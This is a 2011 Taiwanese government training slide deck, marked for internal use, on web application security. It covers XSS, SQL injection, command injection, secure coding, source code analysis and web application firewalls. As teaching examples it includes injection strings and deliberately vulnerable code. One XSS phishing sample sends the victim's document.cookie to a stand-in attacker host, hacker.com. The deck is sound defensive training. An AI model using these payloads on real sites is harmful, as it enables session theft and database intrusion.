1. 【內部使用】
Web應用程式安全防護
國家資通安全會報 技術服務中心
2011/11/15

2. 【內部使用】
大綱
Ÿ Web應用程式的威脅趨勢
Ÿ Web應用程式的常見資安風險
Ÿ 網站開發安全性檢查注意要點
Ÿ 定期檢視Web應用程式
Ÿ 程式維護與安全測試
Ÿ Web應用程式的安全防護技術
1

3. 【內部使用】
Web應用程式的威脅趨勢

4. 【內部使用】
駭客手法演變
Ÿ Web 1.0 (1990 至 2000)
− 駭客為了知名度
Ø 網頁置換
Ÿ Pre-Web 2.0 (2000 至 2004)
− 駭客為了控制網頁伺服器
Ø 用戶資料庫、信用卡號碼、交易紀錄
− 對個人電腦沒興趣
Ÿ Web 2.0 (2004 至 2009)
− 人人是高度網路化的世界公民，從電腦可找出生活足跡
− 駭客對於個人電腦更有興趣
3

5. 【內部使用】
網際網路攻擊趨勢的轉變
Ÿ 超過七成的攻擊來自應用層，而非網路層
--- Gartner 2006
Ÿ 保護網路是不夠的，應用層才是駭客的目標
--- IDC 2006
Ÿ 問題在於現有的資安解決方案都針對網路層攻
擊…
--- Forrester 2006
4

6. 【內部使用】
現有Web應用程式部署與防護架構
七成 的攻擊是針
對這裡 (Gartner)
Database
這些客製的Web應用 Servers
程式有任何防護嗎?? Web應用程式系統 Customer Info
客製的功能元件 Business Data
Transaction Info
第三方套件、開放源碼等
網頁伺服器 應用程式伺服器 資料庫
作業系統 作業系統 作業系統
網路
網路層 入侵偵 機敏資料
防火牆 測/入侵
防禦
僅靠 防火牆 + 網路端入侵防禦系統 + 防毒牆 是完全不夠的！
5

7. 【內部使用】
Why Web?
Ÿ 好人壞人都看的得到
WEB資安事件
Ÿ 無法限制user行為 層出不窮
Ÿ AP安全有誰負責
Ÿ 投資報酬率最高
難擋又難防
Ÿ 既有設備無用武之地 6

8. 【內部使用】
網站資安風險排行榜
OWASP 2004 OWASP 2007
A1 Unvalidated Input A1 Cross Site Scripting (XSS) 源碼檢測
A2 Broken Access Control A2 Injection Flaws (e.g., SQL injection)
A3 Broken Authentication / Session Mg A3 Insecure Remote File Include (e.g. File Inclusion)
A4 Cross Site Scripting A4 Insecure Direct Object Reference (e.g. File Injection)
A5 Buffer Overflow A5 Cross Site Request Forgery (CSRF)
A6 Injection Flaws A6 Information Leakage and Improper Error Handling
A7 Improper Error Handling A7 Broken Authentication / Session Mgmt
A8 Insecure Storage A8 Insecure Cryptographic Storage
A9 Application Denial of Service A9 Insecure Communications
不當設定
A10 Insecure Configuration Management A10 Failure to Restrict URL Access
資料來源: 美國 OWASP 十大Web常見弱點
(OWASP Top 10)
7

9. 【內部使用】
OWASP Top 10 2010 (RC)
Ÿ 最新的網站十大資安風險: SQL等注入類第一名，XSS第二
資料來源: OWASP 8

10. 【內部使用】
十大 Web 罪犯(三大惡寇)
資料來源: WASC (Web
Application Security 3. SQL Injection
Consortium), 2008 1.XSS 2. Resource
Injection
9

11. 網站可被打穿的漏洞「越來越多」 【內部使用】
à 受駭風險高
Ÿ 國際專業機構利用「源碼檢測」等技術分析3萬
個網站之統計結果
Ÿ 每個網站平均有13.11個漏洞(包括8.91個嚴重漏
洞)
資料來源: 2008年9月
美國網站安全聯盟
(Web Application
Security Consortium;
WASC)
10

12. 被打穿的漏洞都是「不當輸入」 【內部使用】
à 防護的當務之急
Ÿ 超過半數的弱點是跨網站入侵字串（XSS）
Ÿ 其次是SQL 嵌入攻擊（SQL Injection）
1
2
資料來源: 2008年9月 美國網站安全聯盟
(Web Application Security Consortium; WASC) 11

13. 【內部使用】
近年重大網站安全漏洞與事件
Google (04 Jul., XSS): Account leakage 帳號外洩
Consequences: Leakage of customer data
Paypal (16 Jun., XSS): Account leakage, Business loss 帳號外洩
Consequences: Leakage of customer data and financial loss
Myspace (16 Jul., XSS): Account leakage 帳號外洩
World's No.1 most visited website with 70M members
Consequences: Leakage of customer data
Netscape.com (26 Jul., XSS): Business loss
Netscape introduced its Digg.com-style service and offered $1,000 conversion reward
Consequences: Customers redirect to competitor’s website!
Sourceforge got hacked by XSS (09 Apr.): Tainted Repository內容遭汙染
Consequences: Hosting tainted repository
Many others:
Hotmail (XSS), Yahoo Mail (XSS), ICQ (XSS)
12

14. 【內部使用】
慘痛的教訓 (大家還記得嗎? )
Ÿ 2007年12月25日，某報頭條
13

15. 【內部使用】
Web應用程式的常見資安風險

16. 【內部使用】
Web應用程式的常見資安風險(1/2)
Ÿ 跨網站入侵字串弱點(XSS, CWE 79)
Ÿ SQL注入弱點 (CWE 89)
Ÿ 資源注入弱點 (CWE 99)
Ÿ 命令注入弱點 (CWE 77)
Ÿ HTTP應答分割 (CWE 113)
Ÿ 反射注入弱點 (CWE 470)
15

17. 【內部使用】
Web應用程式的常見資安風險(2/2)
Ÿ 明文密碼缺失(CWE 259)
Ÿ 資訊揭露 (CWE 200)
Ÿ CRLF 注入 (CWE 93)
Ÿ 程式碼注入 (CWE 94)
16

18. 【內部使用】
跨網站入侵字串 (XSS)
Ÿ 跨網站入侵字串弱點(XSS, CWE 79) 是一個允
許攻擊者植入惡意程式碼，並讓瀏覽器執行的
弱點
Ÿ 依賴Web應用程式接受不可信任之字串，並將
此作為輸出HTML文件的內容之一
Ÿ 受害者的瀏覽器將被迫執行任意的腳本語言
Ÿ 瀏覽器允許這些惡意程式存取cookies，session
tokens以及其他該網站專用的敏感資訊
Ÿ 被應用於製作巧妙的釣魚網站， 以及竄改合法
的網頁內容 17

19. 【內部使用】
我國第一個上報的XSS事件
Ÿ “和對方在網路上展開十幾分鐘的攻防，最後終
於逼退對方，初步統計僅有十三筆資料在過程
中被竊走”?!
(2006年11月)
18

20. 【內部使用】
國際上最有名的首宗XSS事件
Ÿ 利用XSS漏洞在個人簡介一欄植入惡意腳本
(JavaScript)，在不到20小時內即感染超過一百
萬個MySpace.com用戶，最後整個網站癱瘓。
(2005/10)
19

21. 【內部使用】
XSS原來這麼簡單…
http://localhost/xss.jsp?version=
“><script>alert('XSS')</script>
<HTML>
<Body>
<script>alert('XSS')</script>
</Body>
</HTML>
20

22. 【內部使用】
XSS運作流程圖
Ÿ 駭客一旦找到某個URL網址有XSS弱點，他平時所收集的惡
意腳本就可派上用場，形成威力驚人的XSS攻擊字串
受害者
1. URL +
“惡意腳本” 2. HTTP要求 + “惡意腳本”
4. 瀏覽器執行該惡意腳本
3. 網頁回應
駭客 (已內含惡意腳本) 脆弱的
Web應用程式
21

23. 【內部使用】
SQL 注入 (SQL Injection)
Ÿ SQL注入弱點 (CWE 89) 發生在資料庫伺服器可
以被用來執行外部的SQL命令時. 一般來說都是
由網路應用程式的前端執行, 這種攻擊包含輸入
惡意組成的SQL語法, 造成資料庫伺服器執行未
授權的SQL命令。
Ÿ 當具有下列情況時, 一個應用程式就有SQL注入
弱點:
− 使用者輸入沒有被過濾, 或是被不正確的過濾, 造成
SQL語法中有跳脫字元。
− 使用者輸入沒有被限制 - 例如使用強類型 - 因此可
22
以被以非預期的方式執行。

24. 【內部使用】
大規模SQL注入攻擊
Ÿ 自動化工具、SQL注入弱點、Google搜尋引擎 à 完美
的大規模SQL注入攻擊
(2008/05/13 迄今) 23

25. 【內部使用】
實務案例: 提供名字查詢卡號
Ÿ 當輸入Smith時，會將資料庫中符合Smith的資
料顯示至頁面
Ÿ Can he also see others’ credit card numbers?
Ÿ It’s not easy to guess the name one by one
though…
24

26. 【內部使用】
以OR 1=1概念作SQL注入
Ÿ SELECT * FROM user_data WHERE
last_name='Smith' OR '1'='1'--'
25

27. 【內部使用】
此時所有資料都滿足該查詢語句
26

28. 【內部使用】
命令注入 (Command Injection)
網頁設計為了方便，可能由網頁程式直接呼叫系統
上的其他程式，如system()。
如果沒有檢查參數的話會造成Command Injection。
下面表單允許使用者輸入一個關鍵字，然後呼叫
CGI程式search.pl查詢
<input type="text" name="keyword" value="">
search.pl程式如下
system("grep data.txt $keyword > result.log");
如果使用者輸入「;ls;」，則指令變成
system("grep data.txt ;ls; > result.log");
27

29. 【內部使用】
明文密碼 (Hard-coded Password)
Ÿ 明文密碼缺失(CWE 259) 是將密碼直接儲存在
程式碼中。這種撰寫風格會造成密碼管理上的
困難，因為：
− 所有專案的開發人員都可以看到程式碼，不論它們
的權限如何
− 明文密碼有可能被從已編譯過的程式碼中取出
− 當軟體已進入生產，密碼無法被更改，除非是發行
修正程式
− 當密碼要更改時，每個包含密碼的檔案都必須跟著
更新
28

30. 【內部使用】
換行符注入 (CRLF Injection)
Ÿ CRLF 注入 (CWE 93) 發生在應用程式使用
CRLF (表示Carriage Return (ASCII 13，r)及
Line Feed (ASCII 10，n))，當作特殊原件 (例如
換行)，卻並未正確的過濾輸入中的CRLF
29

31. 【內部使用】
網站開發安全性檢查注意要點

32. 【內部使用】
資訊委外的必要控制措施
需求分析 風險評估
徵求建議書 (Requirements) 資安要求
威脅模型 安
架構設計
(Design) 資安架構 全
的
軟
(SSDLC)
程式實作
安全源碼撰寫 體
(Implementation) 開
發
生
測試與驗收 品質確保 命
專案驗收 (Testing) 系統驗收 週
期
定期維護/風險評鑑 部署、運作與維護 教育訓練
(Maintenance) 修補與更版
即時監控
31

33. 【內部使用】
基本XSS攻擊原理
http://localhost/xss.jsp?version=
“><script>alert('XSS')</script>
<HTML>
<Body>
<script>alert('XSS')</script>
</Body>
</HTML>
32

34. 【內部使用】
結合社交工程進行XSS釣魚
<a href=http://vulnerable.site/xss.jsp?version=
<a href=http://vulnerable.site/xss.jsp?version=
<FORM action=http://hacker.com/login.jsp
%3Cimg%20src=%22htt
method=post id=“idForm”>
<INPUT name=“cookie” type=“hidden”>
</FORM>
p://tinyurl.com/6jea7o%2
<SCRIPT>
idForm.cookie.value=document.cookie;
2%3E
idForm.submit();
</SCRIPT> > >
page
All Rights Reserved 33
</a>

35. 【內部使用】
Web應用程式安全模型：Part 1
Web應用程式安全性檢查 「源碼檢測」省
事又有效，但要
VA+PT 是目前最常見的 有程式碼
作法，但不是很有效…
安全弱點評估 滲透測試 源碼檢測
(Vulnerability (Penetration (Source Code
Assessment, VA) Testing, PT) Analysis, SCA)
自動工具/人工檢測 自動工具/人工檢測
軟體版本更新 設定修正
源碼弱點修正 紀錄
設定Web應用程式防火牆規則
治標而不治本…所以規則一定要設對，不然就漏掉了
34

36. 【內部使用】
Web應用程式安全模型：Part 2
錯誤!!
商業邏輯
35

37. 【內部使用】
Web應用程式安全模型：Part 3
不妥!!
過濾 商業邏輯
移除
36

38. 【內部使用】
Web應用程式安全模型：Part 4
較佳!!
過濾 商業邏輯 編碼
移除 跳脫
37

39. 【內部使用】
這樣的PHP就會有XSS問題
<html>
<head>
<title>Hello World</title>
</head>
<body>
<form id="myForm" method="get" action="HelloWorld.php">
Your name:<input id="name" name="name" />
<input type="submit" value=“Hello" />
</form>
<?php
$name = "Hello, " . $_GET["name"] . "!";
echo $name;
?>
</body>
</html>
38

40. 【內部使用】
這樣的JSP就會有XSS問題
<html>
<head>
<title>Hello World</title>
</head>
<body>
<form id="myForm" method="get">
Your name:<input id="name" name="name" />
<input type="submit" value="Hello" />
</form>
<% String name;
name = "Hello, "+request.getParameter("name")+"!";
%>
<%= name %>
</body>
</html>
39

41. 【內部使用】
這樣的Java就會有XSS問題
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class HelloWorld extends HttpServlet {
public void doGet(HttpServletRequest request,
HttpServletResponse response)
throws ServletException, IOException {
PrintWriter out = response.getWriter();
String name = request.getParameter("name");
out.println(name);
}
}
40

42. 【內部使用】
這樣的.NET(C#)就會有XSS問題
<%@ Page Language="C#" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
String name = Request.QueryString.Get(0);
Response.Write(name);
}
</script>
<html>
<head />
<body>
<form id="form" runat="server">
</form>
</body>
</html>
41

43. 【內部使用】
評估可能的修補策略(1/2)
42

44. 【內部使用】
評估可能的修補策略(2/2)
43

45. 【內部使用】
把使用到的過濾函式列舉出來
44

46. 【內部使用】
定期檢視Web應用程式

47. 【內部使用】
資訊委外的必要控制措施
需求分析 風險評估
徵求建議書 (Requirements) 資安要求
威脅模型 安
架構設計
(Design) 資安架構 全
的
軟
(SSDLC)
程式實作
安全源碼撰寫 體
(Implementation) 開
發
生
測試與驗收 品質確保 命
專案驗收 (Testing) 系統驗收 週
期
定期維護/風險評鑑 部署、運作與維護 教育訓練
(Maintenance) 修補與更版
即時監控
46

48. 【內部使用】
教育訓練
Ÿ 機關(構)應定期或不定期對內部及新進人員宣導
Web應用程式安全管理政策
Ÿ 機關(構)應定期或不定期對內部及新進人員開課，
訓練其正確使用網際網路及安全的Web應用程式
操作或開發
47

49. 【內部使用】
定期檢查
Ÿ 機關(構)應定期以自動化檢測工具或服務評估
Web應用程式系統之風險，並比較與前次檢測報
告之差異
− 程式異動？ (源碼行數不一致)
− 檔案異動？ (檔案列表不一致)
− 安全修補？ (發現弱點)
− 入侵事件？ (發現頁面異動或掛馬現象)
Ÿ 以確保上線之系統無論在驗收之初或日後更版均
至少維持招標文件之資安要求!
48

50. 觀察Web應用程式開發狀況 【內部使用】
(源碼檢測為例)
Ÿ 要觀察Web應用程式開發狀況，最基本的就是透
過源碼檢測設備所提供的報表，又可分成下列細
項：
− 受測源碼基本資訊: 源碼檢測行數、檔案數、檢測時間
點、版本資訊
− 檢測環境基本資訊: 檢測弱點模組、檢測環境配置、版
本資訊
− 檢測結果統計: 弱點總數、弱點分類列表
49

51. 【內部使用】
程式維護與安全測試

52. 【內部使用】
程式維護
Ÿ 無論是自行或委外進行Web應用程式的維護作
業之注意要點：
− 須遵照組織政策及安全維護程序
− 參考系統文件進行正確的維護作業
− 更版均需檢附資安評估報告
51

53. 【內部使用】
週期性人工抽測XSS
Ÿ 以人工方式週期性地(建議首次驗收與歷次更版)
抽測Web應用程式系統是否存在XSS弱點
Ÿ Web應用程式安全參考指引附件7： XSS攻擊常
見惡意字串
Ÿ 線上資料: http://ha.ckers.org/xss.html
52
52

54. 【內部使用】
週期性人工抽測SQL Injection
Ÿ 以人工方式週期性地抽測Web應用程式系統是
否存在SQL Injection弱點
Ÿ Web應用程式安全參考指引附件6： SQL
Injection攻擊常見惡意字串
53

55. 【內部使用】
Web應用程式的安全防護技術

56. 【內部使用】
防護發展趨勢
Ÿ 傳統外部檢測
− 高漏報率
− 低精確性
Ÿ 人工源碼檢測
− 低成本效益
Ÿ 自動源碼檢測
− 高涵蓋率
− 高正確性
− 高精確度
Ÿ 應用層防火牆
55

57. 【內部使用】
比較滲透測試與源碼檢測
(以Yapig PHP程式為例)
人工源碼檢測 n-S牌 (商用工具免費 N牌 (免費滲透測試 W牌滲透測試工具 歷屆導入案使用之源碼檢測
版) 工具) 工具
所耗時間 16 Work Hours 15 hours 1.2min 20 min 40sec
($300USD/Hr)
精確性與涵 Depends False positives: False positives: Ÿ False positives: 35% Ÿ False positives: almost 0
蓋率 consultant 99.97% 75%
quality Ÿ False negatives: Ÿ False negative: almost 0
False negatives: high False negatives: 82%
high
備註 Major obvious 35,000 attack 1. 3,300 potentially Can scan many 1. 8,400 types of vulnerable
vulnerabilities; signature dangerous critical security program paths
Difficult to files/CGIs problems
locate 2. Cover the latest PHP
vulnerabilities 2. Version specific (Detail supported version
Note:
across files problems on over vulnerability types is
Came from fuzzing
and enumeration 230 servers. not available) 3. Trace multiple function
patterns calls and file inclusions
Copyright. Armorize Technologies. 2007. Strictly Private and Confidential 56

58. 【內部使用】
自動化原始程式碼分析
分析與檢驗程式碼所有可能的執行路徑(execution paths )
全自動評估程式碼功能
分析所有可能出錯的輸入點
開發中立即指出程式弱點所在
開發中立即提出可行的安全程式建議方案
快速、有效率且無副作用的安全程式設計
…
$var = $_GET[“input”];
…
$db->exec(“select * from “ $var);
All Rights Reserved 57

59. 【內部使用】
自動靜態分析之流程
58

60. 【內部使用】
應用層防火牆部署方式
Ÿ Web Server Plug-in
− 軟體式模組
資安閘道器
Ÿ Reverse Proxy
− 硬體式設備
管理者介面
Ÿ Gateway
Ÿ Partial Deploy
Ÿ Composite Deploy
Reverse Proxy
Ÿ Multi-Location Deploy
WWW Cash Cash WebMail Supply Images
Flow1 Flow2 Chain
59

61. 【內部使用】
應用層防火牆可阻擋的攻擊類型
− Phishing − SQL Injection
− Brute Force Authentication − SSI Injection
− Credential/Session Prediction − Directory Indexing
− Insufficient Session Expiration − Path Traversal
− Session Fixation − Predictable Resource Location
− Content Spoofing − Abuse of Functionality (Spamming,
− Cross Site Scripting Spiders, Data theft)
− Buffer Overflow attacks − Denial of Service
− LDAP Injection − HTTP Response Splitting
− Web Server Fingerprinting − Application Fingerprinting
60

62. 【內部使用】
WAF一夫當關
Ÿ 同樣的XSS攻擊字串被阻擋下來了
61

63. 【內部使用】
WAF一夫當關，非萬能
Ÿ 加以變形編碼竟繞過去了…
62

64. 【內部使用】
Web應用程式安全的防護機制
Web應用程式安全性檢查 「源碼檢測」省事
又有效，但要有程
VA+PT 是目前最常見的 式碼
作法，但不是很有效…
安全弱點評估 滲透測試 源碼檢測
(Vulnerability (Penetration (Source Code
Assessment, VA) Testing, PT) Analysis, SCA)
自動工具/人工檢測 自動工具/人工檢測
軟體版本更新 設定修正
源碼弱點修正 紀錄
設定Web應用程式防火牆規則
雖然是「治標」而不「治本」…但只要規則夠齊全，還是有一定的功效
63

65. 【內部使用】
報告完畢
敬請指教
64